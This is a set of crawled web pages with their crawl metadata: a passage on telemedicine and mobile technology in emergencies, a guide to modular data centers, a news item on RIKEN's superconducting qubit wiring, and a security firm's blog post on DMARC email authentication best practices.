allowing physicians to work more effectively with patients in a remote environment, telemedicine solutions can provide a range of benefits for those in need of support. For instance, a mobile medical strategy can help patients to connect more accurately with their doctors when they don’t speak the same language through artificial intelligence natural language processing apps and translation. Telemedicine can also protect people in environments where visiting a doctor for certain reasons would cause social stigma by allowing them to set up video conferences with the specialist they need. From an economic perspective, telemedicine and mobile technology in the healthcare environment can also reduce costs associated with connecting physicians and patients. While telemedicine and apps may never replace trips to a doctor’s office or hospital entirely, this mode of treatment has already shown significant promise in reducing treatment costs for patients who suffer from chronic illnesses, both mental and physical. Using Mobile Technology in Emergency Conditions Mobile technology also has a significant role to play when it comes to managing emergencies. For years, we’ve relied on smartphones to ensure that we can access the help that we need when our car breaks down, or something goes wrong. Some mobile phone companies even provide panic buttons and GPS tracking devices with their phones, which makes it easier for responders to reach those in danger. Going forward, mobile technology will continue to play a crucial role in helping hospital staff, Red Cross volunteers, and specialists provide support during natural disasters and emergencies. Collaborative applications in a smartphone like Deltapath’s inTeam application can even help first-responders to stay connected and aligned in their quest to help possibly injured people when they need assistance. With push-to-talk services on communication apps, people in areas without internet connections will still be able to collaborate with their team members. This simultaneously makes communication more efficient in the emergency environment and keeps costs low for healthcare companies. As new technology like 5G connectivity, artificial intelligence, and IoT connected devices continue to deliver new possibilities to the mobile world, mobile devices will continue to present new ways of serving humanity. Already, two-thirds of the largest hospitals in the US provide access to mobile health apps, and the global mobile health app market is set to reach a value of approximately $111 billion by 2025. The healthcare environment is just one example of how mobile devices are no longer “just phones,” they’re crucial tools transforming the way that we connect, communicate, and survive.
<urn:uuid:60fe0f9a-9446-492e-bf7e-e12368dfe6c7>
CC-MAIN-2024-38
https://jp.deltapath.com/newsroom/thrive-global-humanitys-future-and-mobile-technology/
2024-09-18T14:39:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00088.warc.gz
en
0.951972
1,265
3.0625
3
April 4, 2013 Data centers of the future are letting go of long-held traditions for design — with modular products and providers ushering in a new era. A modular data center is an approach to data center design that incorporates the use of a factory-built module or a method for delivering data center infrastructure in a modular fashion. Modular solutions take the best ideas for design, reliability, and efficiency and package them into a prefabricated, repeatable, and operationally optimized module. The modular market started with an international standard approach in the shape of an ISO (International Standards Organization) shipping container and has evolved to a fledgling market of vendors that produce everything from containers to a variety of modular designed products and solutions for IT, power and cooling. In some ways, the shift in IT such as cloud computing has been in parallel with modular data center approaches. Data Center Containers vs. Modular Data Centers Often, there is confusion between "data center containers" and "modular data center" terms. A data center container is a particular package that is engineered and delivered as such — in an ISO shipping container. A modular data center, on the other hand, references a deployment method and engineered solution for assembling a data center out of modular components in, many times, prefabricated solutions that enable scalability and a rapid delivery schedule. While a container is not the same thing as a modular data center, a container can be a part of a modular data center. Data Center Container A data center product incorporating customized infrastructure to support power or cooling infrastructure, or racks of IT equipment. Containers are built using an ISO (International Standards Organization) intermodal shipping container. Modular Data Center An approach to data center design that implies either a prefabricated data center module or a deployment method for delivering data center infrastructure in a modular, quick, and flexible method. Types of Modular Solutions Available To build on terminology that has grown around container and modular, Jason Schafer from The 451 Group categorized the types of modular solutions available: Of the four categories, only three meet the definition for modular. The fourth type, a phased approach, may be conceived of as modular in that it is built-out gradually, but is not truly modular. A number of innovations marked the beginnings of the modular products and ideas: Google experimented with a container full of IT, parked in an underground parking garage. They even went so far as to propose a floating data center on cargo ships. In 2006 Sun Microsystems unveiled project Blackbox, an energy-efficient, water-cooled turnkey data center housed in a shipping container. In 2008 Microsoft announced that its new Chicago data center would house up to 220 shipping containers. After the early development of containers, theories evolved and the hype cycle played out for a data center in a box. Numerous hardware vendors, independent companies and data center providers embraced the modular concept and presented their own engineered solution. Additional Modular Data Center Resources About the Author You May Also Like
<urn:uuid:efdb3e6e-0a02-4f3a-a43a-1e8da66b8e40>
CC-MAIN-2024-38
https://www.datacenterknowledge.com/modular-data-centers/what-is-a-modular-data-center-a-dck-guide
2024-09-18T15:50:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00088.warc.gz
en
0.893528
627
2.65625
3
Riken Wires a New Path to Scalable Quantum Computing (MirageNews) Yasunobu Nakamura, Team Leader, Superconducting Quantum Electronics Research Team has written this extensive explanation as to why he believes a new circuit-wiring scheme developed over the last three years by RIKEN, in collaboration with other institutes, opens the door to scaling up to 100 or more qubits within the next decade Challenge one: Scalability The challenge of scalability arises from the fact that each qubit then needs wiring and connections that produce controls and readouts with minimal crosstalk. As we moved past tiny two-by-two or four-by-four arrays of qubits, we have realized just how densely the associated wiring can be packed, and we’ve had to create better systems and fabrication methods to avoid getting our wires crossed, literally. Challenge two: Stability In theory, one way we could deal with instability is to use quantum error correction, where we exploit several physical qubits to encode a single ‘logical qubit’, and apply an error correction protocol that can diagnose and fix errors to protect the logical qubit. But realizing this is still far off for many reasons, not the least of which is the problem of scalability. Challenge Three: Quantum Circuits We at Riken eventually came up with the idea of using a superconducting circuit. The superconducting state is free of all electrical resistance and losses, and so it is streamlined to respond to small quantum-mechanical effects. We use our superconducting quantum-circuit platform in combination with other quantum-mechanical systems. This hybrid quantum system allows us to measure a single quantum reaction within collective excitations-be it precessions of electron spins in a magnet, crystal lattice vibrations in a substrate, or electromagnetic fields in a circuit-with unprecedented sensitivity. Interfacing a superconducting quantum computer to an optical quantum communication network is another future challenge for our hybrid system.
<urn:uuid:8b48708a-d9c3-49c8-b576-452b9d12fcf7>
CC-MAIN-2024-38
https://www.insidequantumtechnology.com/news-archive/riken-wires-a-new-path-to-scalable-quantum-computing/
2024-09-18T13:58:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00088.warc.gz
en
0.900929
419
2.8125
3
by Chuck Mackey and Will Hudec What is DMARC? DMARC (Domain-based Message Authentication, Reporting, and Conformance) is a powerful email authentication protocol designed to protect your email domain from being impersonated. It works by comparing the sender address to authentication information in the email to verify the message is really from your domain. How does it work? When you enable DMARC, receiving email services will check incoming emails that claim to be from your domain against your DMARC settings. If the email fails the DMARC check, it can be rejected or treated with suspicion. Why is it important? - Prevents attackers from sending emails that appear to come from your domain - Allows recipients to identify and reject spoofed/phished emails - Gives visibility into misuse of your domain for sending emails - Enforces email authentication policies across your domain The DMARC protocol increases the trustworthiness of your domain and enhances email deliverability. While it is an essential tool in your email security toolkit, it should be part of a broader email security strategy that includes other measures such as user training, strong passwords, and regular security updates. Fortress Security Risk Management provides the following best practices for establishing and optimizing DMARC: 1. Understand DMARC Basics: Familiarize yourself with the DMARC protocol and how it works. It builds upon SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to add an additional layer of protection. 2. Gradual Deployment: Start with a “p=none” policy, which monitors and reports but doesn’t enforce. This allows you to understand the email landscape for your domain without affecting email delivery. 3. Publish DMARC Records: Publish a DMARC DNS record for your domain. This record specifies your DMARC policy, how to manage emails that don’t pass authentication, and where to send aggregate and forensic reports. 4. Alignment of SPF and DKIM: Ensure that SPF and DKIM records are properly configured and aligned with your DMARC policy. The “alignment” is crucial for DMARC to work effectively. Make sure the “From” domain in the email header aligns with your SPF and DKIM. 5. Use DKIM Signatures: Always use DKIM signatures for your outgoing emails. This ensures that email recipients can verify the authenticity of your messages. 6. Subdomain Policy: Consider setting separate DMARC policies for your subdomains. You can start with a less strict policy for subdomains and tighten it as needed. 7. Use Reporting: Configure DMARC to send reports to your specified email address. These reports provide valuable insights into the sources and results of email authentication checks, helping you identify any issues. 8. Review DMARC Reports: Regularly analyze DMARC reports to understand who is sending emails on behalf of your domain. Look for anomalies and unauthorized senders. 9. Gradual Policy Enforcement: Once you’ve gathered enough data and are confident in your email infrastructure, switch to a “p=quarantine” or “p=reject” policy to stop unauthorized emails. Be cautious about moving too quickly, as it can lead to legitimate emails being rejected. 10. Authenticity Checks: Ensure that your email authentication methods, such as SPF and DKIM, are correctly implemented. Review the DMARC reports for any authentication failures and resolve them. 11. Monitor Email Deliverability: Continuously monitor email deliverability to ensure that legitimate emails aren’t being blocked or sent to spam. Keep an eye on bounce rates, engagement metrics, and feedback loops. 12. Implement DMARC Alerts: Configure email alerts to notify you of any DMARC policy failures. This way, you can take immediate action if your domain is being abused. 13. Maintain a DMARC Record: Regularly review and update your DMARC record as your email infrastructure evolves. 14. Education and Training: Educate your team and users about the importance of DMARC and how it helps protect against phishing. Encourage them to be vigilant and report any suspicious emails. 15. Seek Professional Assistance: If you’re unsure about DMARC implementation, consider seeking the assistance of email security expertise from Fortress SRM for using email security tools and services. Properly implementing DMARC provides strong protection against email spoofing and phishing attacks, giving recipients high confidence in the authenticity of emails from your domain. About Fortress SRM: Fortress Security Risk Management protects companies from the financial, operational, and emotional trauma of cybercrime by enhancing the performance of their people, processes, and technology. Offering a robust, co-managed solution to enhance an internal IT team’s capability and capacity, Fortress SRM features a full suite of managed security services (24/7/365 U.S. based monitoring, cyber hygiene (managed patching), endpoint detection and response (EDR), and air-gapped and immutable cloud backups) plus specialized services like Cybersecurity-as-a-Service, Incident Response including disaster recovery & remediation, M&A cyber due diligence, GRC advisory, identity & access management, threat intelligence, vulnerability assessments, and technical testing. With headquarters in Cleveland, Fortress SRM supports companies with both domestic and international operations. In Case of Emergency: Cyber Attack Hotline: 888-207-0123 | Report an Attack: IR911.com For Preventative and Emergency Resources, please visit:
<urn:uuid:1f5598a3-a75b-47ee-8b22-fc65d270127f>
CC-MAIN-2024-38
https://fortresssrm.com/unwrapping-dmarc-secure-email-communication/
2024-09-10T00:08:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00888.warc.gz
en
0.893212
1,170
2.953125
3